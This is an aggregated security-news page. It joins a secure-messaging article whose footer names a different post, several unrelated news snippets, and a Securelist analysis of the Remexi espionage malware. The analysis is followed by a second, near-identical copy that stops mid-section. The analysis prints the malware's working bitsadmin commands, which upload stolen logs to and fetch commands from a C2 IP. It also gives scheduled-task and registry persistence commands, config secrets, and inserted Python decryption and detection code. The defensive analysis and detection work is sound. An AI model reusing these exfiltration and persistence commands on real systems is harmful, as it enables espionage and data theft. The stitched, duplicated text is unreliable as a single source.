Repeatedly, Apple CEO Tim Cook has supported user security and privacy, saying in 2015: “We believe that people have a fundamental right to privacy. The American people demand it, the constitution demands it, morality demands it.”

But even with these sterling reputations, the truth is, cybersecurity is hard to get right.

Last year, cybersecurity researchers found a critical vulnerability in Signal’s desktop app that allowed threat actors to obtain users’ plaintext messages. Signal’s developers fixed the vulnerability within a reported five hours.

Last week, Apple’s FaceTime app, which encrypts video calls between users, suffered a privacy bug that allowed threat actors to briefly spy on victims. Apple fixed the bug after news of the vulnerability spread.

In fact, several secure messaging apps, including Telegram, Viber, Confide, Allo, and WhatsApp have all reportedly experienced security vulnerabilities, while several others, including Wire, have previously drawn ire because of data storage practices.

But vulnerabilities should not scare people from using end-to-end encryption altogether. On the contrary, they should spur people into finding the right end-to-end encrypted messaging app for themselves.

No one-size-fits-all, and that’s okay

There is no such thing as a perfect, one-size-fits-all secure messaging app, said Electronic Frontier Foundation Associate Director of Research Gennie Gebhart, because there’s no such thing as a perfect, one-size-fits-all definition of secure.

“In practice, for some people, secure means the government cannot intercept their messages,” Gebhart said. “For others, secure means a partner in their physical space can’t grab their device and read their messages. Those are two completely different tasks for one app to accomplish.”

In choosing the right secure messaging app for themselves, Gebhart said people should ask what they need and what they want. Are they worried about governments or service providers intercepting their messages? Are they worried about people in their physical environment gaining access to their messages? Are they worried about giving up their phone number and losing some anonymity?

In addition, it’s worth asking: What are the risks of an accident, like, say, mistakenly sending an unencrypted message that should have been encrypted? And, of course, what app are friends and family using?

As for the constant news of vulnerabilities in secure messaging apps, Gebhart advised not to overreact. The good news is, if you’re reading about a vulnerability in a secure messaging tool, then the people building that tool know about the vulnerability, too. (Indeed, developers fixed the majority of the security vulnerabilities listed above.) The best advice in that situation, Gebhart said, is to update your software.

“That’s number one,” Gebhart said, explaining that, though this line of defense is “tedious and maybe boring,” sometimes boring advice just works. “Brush your teeth, lock your door, update your software.”

Cybersecurity is many things. It’s difficult, it’s complex, and it’s a team sport. That team includes you, the user. Before you use a messenger service, or go online at all, remember to follow the boring advice. You’ll better secure yourself and your privacy.

The post Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle appeared first on Malwarebytes Labs.

The problem with vulnerable IoT companion apps

There’s no shortage of exploitable security holes in widely used Internet of Things devices, so it shouldn’t come as a surprise that the communication between many of those devices and their companion apps is not encrypted.

The research

A group of researchers from Brazil’s Federal University of Pernambuco and the University of Michigan have analyzed 32 unique companion Android apps for 96 WiFi and Bluetooth-enabled devices popular on Amazon. They searched for answers to the … More

The post The problem with vulnerable IoT companion apps appeared first on Help Net Security.

Safer Internet Day: Security vs. Convenience

It isn’t easy to be secure all the time — this is especially true if you are new to cybersecurity. A well-formed security plan takes deliberate effort at the very least, and constant vigilance at most. Even the top experts have room to improve because cybersecurity is a constantly moving target.

Unfortunately, most internet users aren’t using best practices.

The top two [passwords] have been left unchanged for the fifth year in a row.

Continue reading Safer Internet Day: Security vs. Convenience at Sucuri Blog.

$137 million Worth of QuadrigaCX’s Customers’ Bitcoin Stuck in The Abyss

Cryptocurrency exchange QuadrigaCX has suffered a security incident after it lost control of its customers’ assets. $137 million worth of

$137 million Worth of QuadrigaCX’s Customers’ Bitcoin Stuck in The Abyss on Latest Hacking News.

A Review Of Cyclonis Password Manager – Manages Your Passwords For Free!

Best practice dictates that users should use a different password for every online account they own, for an average internet

A Review Of Cyclonis Password Manager – Manages Your Passwords For Free! on Latest Hacking News.

Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities

Executive Summary

Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation. This malware has previously been associated with an APT actor that Symantec calls Chafer.

The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data. Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests.

Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. They most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive.

XOR and RC4 encryption are used with fairly long keys that are unique to each sample. Among all these random keys, the word “salamati”, which means “health” in Farsi, was also used once.

Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent. This blog post is based on our original report shared with our APT Intelligence Reporting customers in November 2018. For more information please contact: intelreports@kaspersky.com

Technical analysis

The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015. The newest module’s compilation timestamp is March 2018. The developers used the GCC compiler on Windows in the MinGW environment.

Inside the binaries the compiler left references to the names of the C source modules used: “operation_reg.c”, “thread_command.c” and “thread_upload.c”. As those file names suggest, the malware consists of several worker threads dedicated to different tasks, including C2 command parsing and data exfiltration. For both receiving C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) to communicate with the C2 over HTTP.

Proliferation

So far, our telemetry hasn’t provided any concrete evidence of how the Remexi malware spreads. However, it is worth mentioning that for one victim we found a correlation between the execution of Remexi’s main module and the execution of an AutoIt script compiled as a PE, which we believe may have dropped the malware. This dropper fetched its payload over FTP using hardcoded credentials; the FTP server was no longer accessible at the time of our analysis.

Malware features

Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and browser history, and execute remote commands. Its encryption consists of XOR with a hardcoded key for the configuration and RC4 with a predefined password for the victim’s data.

Remexi includes several modules that it deploys in its working directory: configuration decryption and parsing, victim activity logging launched as a separate module, and a set of worker threads for espionage and auxiliary functions (enumerated in the main-module section below). The developers lean on legitimate Microsoft utilities, listed in the table below.

Utility | Usage
extract.exe | Deploys modules from the .cab file into the working Event Cache directory
bitsadmin.exe | Fetches files from the C2 server to parse and execute commands; sends exfiltrated data
taskkill.exe | Ends the working cycle of modules

Persistence

Persistence relies on scheduled tasks and the system registry, with mechanisms that vary by OS version. On old Windows versions such as XP, the main module events.exe runs an edited copy of Microsoft’s XPTask.vbs sample script to create a weekly scheduled task for itself. On newer operating systems, events.exe writes a task definition file, task.xml, into its working directory and registers it with the following command:

schtasks.exe /create /TN "Events\CacheTask_<user_name_here>" /XML "<event_cache_dir_path>\task.xml" /F

At the registry level, the modules achieve persistence by appending themselves to

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

where the Winlogon subkey is writable (adding values under HKLM requires administrative rights), and by adding a value at

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

All such indicators of compromise are listed in the corresponding appendix below.

Commands

All commands received from the C2 are first saved to an auxiliary file and then stored, encrypted, in the system registry. A dedicated thread decrypts and executes them.

Command | Description
search | Searches for matching files
search&upload | Encrypts matching files and adds them to the upload directory under the provided name
uploadfile | Encrypts the specified file and adds it to the upload directory under the provided name
uploadfolder | Encrypts the specified directory and adds it to the upload directory under the provided name
shellexecute | Silently executes the received command with cmd.exe
wmic | Silently executes the received command with wmic.exe (for WMI commands)
sendIEPass | Encrypts all gathered browser data into files for upload to the C2
uninstall | Removes files, the directory and BITS jobs

Cryptography

To decrypt its configuration data, the malware uses XOR with a 25-character key, such as “waEHleblxiQjoxFJQaIMLdHKz”, that differs for every sample. RC4 file encryption relies on the Win32 CryptoAPI, with the RC4 key derived from the MD5 hash of the supplied password (RC4 is a stream cipher and takes no initialization vector; the hash is key material, not an IV). Among all these random keys, the word “salamati”, which means “health” in Farsi, was also used once.
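As an added example (not code from the Securelist report and not the malware’s own code), the following Python re-implements the two primitives just described so that recovered config.ini, clipboard log.txt and upload-directory files can be decrypted offline. The repeating-key XOR and textbook RC4 are as stated above; the key-derivation step is an assumption: the report says the password’s MD5 hash is used with the Win32 CryptoAPI, and the standard CryptoAPI pattern (CryptCreateHash with CALG_MD5, CryptHashData over the password, CryptDeriveKey for CALG_RC4) yields a 128-bit RC4 key equal to the MD5 digest, which is what is modelled here. The “field=value” layout of config.ini, the stand-in RC4 password and all sample data are constructed for the example.

```python
"""Added example: decrypt Remexi-style artefacts offline.

Not the Securelist report's code and not the malware's own code. The
CryptoAPI key-derivation model (MD5 digest used directly as the RC4 key)
is an assumption; all sample data is constructed.
"""
import hashlib
from itertools import cycle

SAMPLE_XOR_KEY = b"waEHleblxiQjoxFJQaIMLdHKz"  # 25-byte per-sample key quoted in the report
CLIPBOARD_KEY = b"salamati"                   # key the report gives for the clipboard log.txt


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric: the same call encrypts and decrypts."""
    if not key:
        raise ValueError("empty XOR key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def rc4_key_from_password(password: bytes) -> bytes:
    """Assumed model of CryptDeriveKey(CALG_RC4) over a CALG_MD5 hash object:
    for a 128-bit key and a 128-bit digest the key is the digest itself."""
    return hashlib.md5(password).digest()


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling (KSA) then keystream XOR (PRGA). Symmetric."""
    if not key:
        raise ValueError("empty RC4 key")
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_config(blob: bytes, xor_key: bytes) -> dict:
    """XOR-decrypt config.ini and parse it. The report lists field names and
    sample values but not the on-disk layout; 'field=value' lines are assumed."""
    text = xor_bytes(blob, xor_key).decode("utf-8", errors="replace")
    cfg = {}
    for line in text.splitlines():
        if "=" in line:
            name, value = line.split("=", 1)
            cfg[name.strip()] = value.strip()
    return cfg


def decrypt_clipboard_log(blob: bytes) -> str:
    """log.txt holds clipboard text XOR-ed with the 'salamati' key."""
    return xor_bytes(blob, CLIPBOARD_KEY).decode("utf-8", errors="replace")


def decrypt_exfil_file(blob: bytes, password: bytes) -> bytes:
    """Upload-directory files: RC4 under the password-derived key."""
    return rc4(rc4_key_from_password(password), blob)


# --- constructed demo artefacts (not recovered from a real infection) ------
CONSTRUCTED_CONFIG = (
    b"Servers=http://108.61.189.174\n"
    b"ZipPass=KtJvOXulgibfiHk\n"
    b"captureScreenTimeOut=72\n"
    b"captureActiveWindowTimeOut=313\n"
)
ENCRYPTED_CONFIG = xor_bytes(CONSTRUCTED_CONFIG, SAMPLE_XOR_KEY)
CONSTRUCTED_RC4_PASSWORD = b"constructed-password"   # stands in for the real hardcoded one
ENCRYPTED_UPLOG = rc4(rc4_key_from_password(CONSTRUCTED_RC4_PASSWORD),
                      b"upLog.txt: keystrokes...")

if __name__ == "__main__":
    print(decrypt_config(ENCRYPTED_CONFIG, SAMPLE_XOR_KEY))
    print(decrypt_exfil_file(ENCRYPTED_UPLOG, CONSTRUCTED_RC4_PASSWORD))
    print(decrypt_clipboard_log(xor_bytes(b"pasted secret", CLIPBOARD_KEY)))
```

The RC4 core is checked against the public “Key”/“Plaintext” test vector, so any mismatch on a real sample points at the key derivation rather than the cipher: if a sample turns out to use a different key length or a salted derivation, only rc4_key_from_password needs to change.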

Configuration

Config.ini is the file where the malware stores its encrypted configuration data. It contains the following fields:

Field | Sample value | Description
diskFullityCheckRatio | 1.4 | Working-directory size threshold: the directory is deleted once it grows to the free disk space multiplied by this ratio
captureScreenTimeOut | 72 | Modulus applied to a loop counter after a mouse click; governs how often a full-screen screenshot is taken (see below)
captureActiveWindowTimeOut | 313 | Same, for active-window screenshots
captureScreenQC | 40 | Not really used; probably full-screen screenshot quality
captureActiveQC | 40 | Not really used; probably active-window screenshot quality
CaptureSites | VPN*0,0; Login*0,0; mail*0,0; Security*0,0 | Window titles of interest for screenshots, triggered from the left-mouse-button and Enter keypress hooks
important | upLog.txt; upSCRLog.txt; upSpecial.txt; upFile.txt; upMSLog.txt | Files sent to the C2 with bitsadmin.exe from the dedicated upload thread
maxUpFileSizeKByte | 1000000 | Maximum size of a file uploaded to the C2
Servers | http://108.61.189.174 | Control server HTTP URL
ZipPass | KtJvOXulgibfiHk | Password for the uploaded zip archives
browserPasswordCheckTimeout | 300000 | Milliseconds to wait between collections of key3.db, cookies.sqlite and other browser files in the dedicated thread

Most of the parameters are self-explanatory. However, captureScreenTimeOut and captureActiveWindowTimeOut deserve a closer look, because they are not timeouts in the usual sense.

One of the malware threads loops forever, checking whether a mouse button was pressed and incrementing an integer counter on every iteration. When the mouse hook registers a button press it signals the screenshotting thread through a global variable; that thread then takes a screenshot only if the counter modulo captureScreenTimeOut (for the full screen) or captureActiveWindowTimeOut (for the active window) is zero. The two values therefore set how often, measured in loop iterations, a click actually results in a screenshot.

Main module (events.exe)

SHA256: b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31
MD5: c981273c32b581de824e1fd66a19a281
Compiled: GCC compiler in MinGW environment, version 2.24; timestamp set to 1970 by the compiler
Type: I386 Windows GUI EXE
Size: 68 608 bytes

After checking that the malware is not already installed, it unpacks HCK.cab using the Microsoft standard utility expand.exe with the following arguments:

expand.exe -r "<full path to HCK.cab>" -f:* "<event_cache_dir_path>\"

Then it decrypts config.ini file with a hardcoded 25-byte XOR key that differs for every sample. It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads:

ID | Thread description
1 | Fetches commands from the C2 with bitsadmin.exe and saves them to a file and to the system registry
2 | Decrypts the command from the registry using RC4 with a hardcoded key, and executes it
3 | Saves bitmaps from the clipboard as screenshots to the \Cache005 subdirectory and Unicode text from the clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi)
4 | Saves screenshots to the \Cache005 subdirectory at the captureScreenTimeOut and captureActiveWindowTimeOut frequencies
5 | Checks the network connection, encrypts and sends gathered logs
6 | Unhooks mouse and keyboard, removes the BITS job
7 | Checks whether the malware’s working directory size already exceeds its threshold
8 | Gathers the victim’s credentials, visited-website cache, decrypted Chrome login data, and the Firefox databases with cookies, keys, signons and downloads

The malware uses the following command to receive data from its C2:

bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal <server> <file>

where <server> is http://<server_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>

Activity logging module (Splitter.exe)

This module is called from the main thread to capture screenshots of windows whose titles match the CaptureSites configuration field, as well as bitmaps and text from the clipboard.

SHA256: a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff
MD5: 1ff40e79d673461cd33bd8b68f8bb5b8
Compiled: 2017.08.06 11:32:36 (GMT), version 2.22
Type: I386 Windows Console EXE
Size: 101 888 bytes

Instead of implementing this auxiliary module as a dynamic-link library with exported functions, the developers chose a standalone executable that events.exe starts with the following parameters:

Parameter | Description
-scr | Screenshot file name to save in the Cache006 subdirectory, zipped with the password from the configuration. Captures either the whole screen (“AllScreen”) or the active window (“ActiveWindow”)
-ms | Screenshot file name to save in the Cache006 subdirectory, zipped with the password from the configuration. Specifies the screen coordinates to capture
-zip | Name of the password-protected zip archive (password from the configuration data)
-clipboard | Screenshot file name under which a bitmap from the clipboard is saved in the Cache005 subdirectory, zipped with the password from the configuration

Data exfiltration

Exfiltration is done through the bitsadmin.exe utility. BITS has shipped with every Windows version from XP through the current Windows 10 releases; it was designed for background download/upload jobs, most prominently for Windows Update, which is exactly why its traffic is easy to overlook. The following command uploads data from the victim to the C2:

bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "<control_server>/YP01_<victim_fingerprint>_<log_file_name>" "<log_file_name>"
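Every command on this page (the schtasks registration in the Persistence section, the bitsadmin download at the end of the main-module section and the upload above) runs an ordinary signed Windows utility, so detection has to key on arguments and targets rather than on the binaries. The following Python is an added example, not part of the Securelist report, that runs that logic over process-creation and registry-set events: it flags bitsadmin /TRANSFER jobs whose endpoint is a raw IP address (the appendix notes the C2 is addressed by IP) or that carry the HelpCenterDownload/HelpCenterUpload job names or the asp.asp?ui= and YP01_ URL patterns, schtasks /create with a CacheTask_ task name, expand.exe unpacking into an Event Cache directory, and writes to the Winlogon\Userinit and Run\Microsoft Activity Manager values. The event layout (dictionaries with Image, CommandLine and TargetObject fields, as a Sysmon-to-JSON pipeline would supply) and every sample event are constructed for the example.

```python
"""Added example: process-creation / registry-event detection for the
Remexi living-off-the-land tradecraft described on this page. Not part of
the Securelist report; the event layout and all sample events are constructed.
"""
import re
from urllib.parse import urlparse

IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
URL_IN_CMD = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _references_raw_ip(cmd: str) -> bool:
    """True if any URL in the command line has a bare IPv4 address as its host."""
    for url in URL_IN_CMD.findall(cmd):
        host = urlparse(url).hostname or ""
        if IPV4_HOST.match(host):
            return True
    return False


def classify(event: dict) -> list:
    """Return the rule names an event triggers (empty list if nothing matches)."""
    hits = []
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    low = cmd.lower()

    # BITS jobs: the page's download/upload commands, C2 addressed by raw IP
    if image == "bitsadmin.exe" and "/transfer" in low:
        if _references_raw_ip(cmd):
            hits.append("bits_transfer_to_raw_ip")
        if "helpcenterdownload" in low or "helpcenterupload" in low:
            hits.append("remexi_bits_job_name")
        if "asp.asp?ui=" in low or "/yp01_" in low:
            hits.append("remexi_c2_url_pattern")

    # Persistence: schtasks /create ... /TN "Events\CacheTask_<user>"
    if image == "schtasks.exe" and "/create" in low and "cachetask_" in low:
        hits.append("remexi_scheduled_task")

    # Staging: expand.exe unpacking HCK.cab into the Event Cache directory
    if image == "expand.exe" and "event cache" in low:
        hits.append("remexi_cab_unpack_event_cache")

    # Registry value writes (Sysmon event 13 style TargetObject field)
    target = event.get("TargetObject", "").lower()
    if target.endswith("\\currentversion\\winlogon\\userinit"):
        hits.append("winlogon_userinit_modified")
    if target.endswith("\\currentversion\\run\\microsoft activity manager"):
        hits.append("remexi_run_key")
    return hits


def scan(events: list) -> list:
    """Classify a stream of events; returns (index, rules) for every hit."""
    results = []
    for idx, event in enumerate(events):
        rules = classify(event)
        if rules:
            results.append((idx, rules))
    return results


# --- constructed sample events (not real telemetry) ------------------------
EVENT_CACHE = r"C:\Users\user\AppData\Roaming\Microsoft\Event Cache"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": 'bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal '
                    '"http://108.61.189.174/asp.asp?ui=WS01nrg-00-11-22-user" '
                    '"' + EVENT_CACHE + r'\Cache001\cde00.acf"'},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": 'bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal '
                    '"http://108.61.189.174/YP01_fingerprint_upLog.txt" "upLog.txt"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks.exe /create /TN "Events\\CacheTask_user" /XML "'
                    + EVENT_CACHE + r'\task.xml" /F'},
    {"Image": r"C:\Windows\System32\expand.exe",
     "CommandLine": 'expand.exe -r "C:\\Users\\user\\HCK.cab" -f:* "' + EVENT_CACHE + '\\"'},
    # benign control: BITS job addressed by hostname, unrelated job name
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": 'bitsadmin.exe /TRANSFER wu /DOWNLOAD /PRIORITY normal '
                    '"https://download.windowsupdate.com/update.cab" "C:\\update.cab"'},
    # registry value set, Sysmon event 13 style
    {"Image": EVENT_CACHE + r"\events.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"},
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, rules)
```

The raw-IP BITS rule is the highest-signal one because legitimate BITS jobs (Windows Update, browser downloads) almost always address hostnames; the job-name, path and URL-pattern rules are sample-specific and will need updating when the operators rename them.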

Victims

The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses. Some of these appear to be foreign diplomatic entities based in the country.

Attribution

The Remexi malware has been associated with an APT actor called Chafer by Symantec.

One of the human-readable encryption keys is “salamati”, most likely the Latin-script transliteration of the Farsi word for “health”. Among the artifacts left by the malware authors, we found a .pdb path in the binaries containing the Windows user name “Mohamadreza New”. Interestingly, the FBI’s wanted-cybercriminals list includes two Iranians named Mohammad Reza, although this could be a common name or even a false flag.

Conclusions

Activity of the Chafer APT group has been observed since at least 2015, but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even longer. Traditionally, Chafer has been focusing on targets inside Iran, although their interests clearly include other countries in the Middle East.

We will continue to monitor how this set of activity develops in the future.

Indicators of compromise

File hashes

events.exe
028515d12e9d59d272a2538045d1f636
03055149340b7a1fd218006c98b30482
25469ddaeff0dd3edb0f39bbe1dcdc46
41b2339950d50cf678c0e5b34e68f537
4bf178f778255b6e72a317c2eb8f4103
7d1efce9c06a310627f47e7d70543aaf
9f313e8ef91ac899a27575bc5af64051
aa6246dc04e9089e366cc57a447fc3a4
c981273c32b581de824e1fd66a19a281
dcb0ea3a540205ad11f32b67030c1e5a

splitter.exe
c6721344af76403e9a7d816502dca1c8
d3a2b41b1cd953d254c0fc88071e5027
1ff40e79d673461cd33bd8b68f8bb5b8
ecae141bb068131108c1cd826c82d88b
12477223678e4a41020e66faebd3dd95
460211f1c19f8b213ffaafcdda2a7295
53e035273164f24c200262d61fa374ca

Domains and IPs

108.61.189.174

Hardcoded mutexes

Local\TEMPDAHCE01
Local\zaapr
Local\reezaaprLog
Local\{Temp-00-aa-123-mr-bbb}

Scheduled task

CacheTask_<user_name_here>

Directory with malicious modules

Main malware directory: %APPDATA%\Microsoft\Event Cache
Commands from C2 in subdirectory: Cache001\cde00.acf

Events.exe persistence records in Windows system registry keys

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

Victims’ fingerprints stored in

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData or
HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData

RC4 encrypted C2 commands stored in

HKCU\SOFTWARE\Microsoft\Fax

HTTP requests template

http://<server_ip_from_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>
BITS transfer jobs created with bitsadmin.exe to external network resources addressed by raw IP address rather than by hostname

Securelist: Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities

Executive Summary

Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation. This malware has previously been associated with an APT actor that Symantec calls Chafer.

The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data. Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests.

Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. They most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive.

XOR and RC4 encryption is used with quite long unique keys for different samples. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent. This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018. For more information please contact: intelreports@kaspersky.com

Technical analysis

The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015. The newest module’s compilation timestamp is March 2018. The developers used GCC compiler on Windows in the MinGW environment.

Inside the binaries the compiler left references to the names of the C source file modules used: “operation_reg.c”, “thread_command.c” and “thread_upload.c”. Like mentioned in modules file names the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data exfiltration. For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP.

Proliferation

So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload. FTP server was not accessible any more at the time of our analysis.

Malware features

Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data.

Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions. The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below.

Utility Usage
extract.exe Deploys modules from the .cab file into the working Event Cache directory
bitsadmin.exe Fetches files from the C2 server to parse and execute commands. Send exfiltrated data
taskkill.exe Ends working cycle of modules

Persistence

Persistence modules are based on scheduled tasks and system registry. Mechanisms vary for different OS versions. In the case of old Windows versions like XP, main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for itself. For newer operating systems, events.exe creates task.xml as follows:

Then it creates a Windows scheduled task using the following command:

schtasks.exe /create /TN \"Events\\CacheTask_<user_name_here>" /XML \"<event_cache_dir_path>t /F"

At the system registry level, modules achieve persistence by adding themselves into the key:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

when it finds possible add values to the Winlogon subkey, and in

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager. All such indicators of comprometation are mentioned in correspondent appendix below.

Commands

All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them.

Command Description
search Searches for corresponding files
search&upload Encrypts and adds the corresponding files to the upload directory with the provided name
uploadfile Encrypts and adds the specified file to the upload directory with the provided name
uploadfolder Encrypts and adds the mentioned directory to the upload directory with the provided name
shellexecute Silently executes received command with cmd.exe
wmic Silently executes received command with wmic.exe (for WMI commands)
sendIEPass Encrypts and adds all gathered browser data into files for upload to C2
uninstall Removes files, directory and BITS tasks

Cryptography

To decrypt the configuration data, the malware uses XOR with 25-character keys such as “waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value’s MD5 hash as an initial vector. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Configuration

Config.ini is the file where the malware stores its encrypted configuration data. It contains the following fields:

Field Sample value Description
diskFullityCheckRatio 1.4 Malware working directory size threshold. It will be deleted if it becomes as large as the free available space multiplied by this ratio
captureScreenTimeOut 72 Probability of full and active window screenshots being taken after mouse click
captureActiveWindowTimeOut 313
captureScreenQC 40 Not really used. Probably full and active window screenshot quality
captureActiveQC 40
CaptureSites VPN*0,0
Login*0,0
mail*0,0
Security*0,0
Window titles of interest for screenshots, using left mouse button and Enter keypress hook
important upLog.txt
upSCRLog.txt
upSpecial.txt
upFile.txt
upMSLog.txt
List of files to send to C2 using bitsadmin.exe from the dedicated thread
maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2
Servers http://108.61.189.174 Control server HTTP URL
ZipPass KtJvOXulgibfiHk Password for uploaded zip archives
browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread

Most of the parameters are self-explanatory. However, captureScreenTimeOut and captureActiveWindowTimeOut are worth describing in more detail as their programming logic is not so intuitive.

One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator infinitely. If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global variable. After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of 0. In that case, it takes a screenshot.

Main module (events.exe)

SHA256 b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31
MD5 c981273c32b581de824e1fd66a19a281
Compiled GCC compiler in MinGW environment version 2.24, timestamp set to 1970 by compiler
Type I386 Windows GUI EXE
Size 68 608

After checking that the malware is not already installed, it unpacks HCK.cab using the Microsoft standard utility expand.exe with the following arguments:

expand.exe -r \"<full path to HCK.cab>\" -f:* \"<event_cache_dir_path>\\\"

Then it decrypts config.ini file with a hardcoded 25-byte XOR key that differs for every sample. It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads:

ID Thread description
1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility
2 Decrypts command from registry using RC4 with a hardcoded key, and executes it
3 Transfers screenshots from the clipboard to \Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi)
4 Transfers screenshots to \Cache005 subdirectory with captureScreenTimeOut and captureActiveWindowTimeOut frequencies
5 Checks network connection, encrypts and sends gathered logs
6 Unhooks mouse and keyboard, removes bitsadmin task
7 Checks if malware’s working directory size already exceeds its threshold
8 Gathers victim’s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads

The malware uses the following command to receive data from its C2:

bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal <server> <file>
